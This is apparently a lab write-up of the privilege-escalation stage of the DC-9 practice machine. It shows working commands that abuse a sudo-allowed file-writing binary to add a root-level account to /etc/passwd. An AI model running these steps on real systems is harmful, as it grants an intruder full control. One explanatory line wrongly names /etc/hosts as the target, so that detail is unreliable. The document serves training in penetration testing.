sudo privileges
It has been identified that the fredf user has sudo privileges to execute the /opt/devstuff/dist/test/test command without getting prompted for password as the root account.
The /opt/devstuff/dist/test/test file seems to be the binary version of the Python script; /opt/devstuff/test.py
The python script:
- Reads the first argument
- Writes the content of the first argument to the second argument.
fredf@dc-9:~$ openssl passwd qwe123
wGjkkGNAt0rG2Creating a password hash using openssl.
fredf@dc-9:~$ echo 'r00t:wGjkkGNAt0rG2:0:0:r00t:/root:/bin/bash' > peBuilding a “root” profile into the pe file.
fredf@dc-9:~$ sudo -u root /opt/devstuff/dist/test/test ./pe /etc/passwdThe command above will read the pe file containing the “root” profile, and append it to the /etc/hosts file.
/Play/DC-9/5-Privilege_Escalation/attachments/{DDFBDA23-925F-4EC8-8C86-7274DEB0383D}.png)
System level compromise